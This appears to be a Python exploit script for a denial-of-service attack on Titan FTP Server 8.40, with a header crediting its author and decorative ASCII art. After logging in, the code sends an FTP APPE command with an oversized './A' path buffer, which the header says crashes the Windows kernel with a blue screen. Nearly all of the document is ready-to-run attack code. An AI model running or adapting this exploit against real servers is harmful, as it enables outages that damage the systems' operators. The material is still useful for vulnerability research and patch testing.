#!/usr/bin/python # # Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash # Date: 25/11/2011 # Author: Houssam Sahli # Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe # Version: 8.40 # Developed by : South River Technologies, Inc. # Tested on: Windows XP SP3 French # Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death". # Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it. print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft" print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj" print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U" print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f" print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft" print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft" print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12" print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU" print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft" print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU" print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f" print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft" print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12" print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU" print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2" print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf" print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2" print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J" print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11" print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf" print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1" print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf" print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12" print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU" print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22" print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2" print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F" print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf" print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21" print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf" print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1" print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n" print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n" import socket import sys def Usage(): print ("Usage: ./expl.py <host> <Username> <password>\n") buffer= "./A" * 2000 def start(hostname, username, passwd): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] " + r sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] wait for the crash...;)" sock.send("APPE %s\r\n" %buffer) sock.close() if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) sys.exit(0)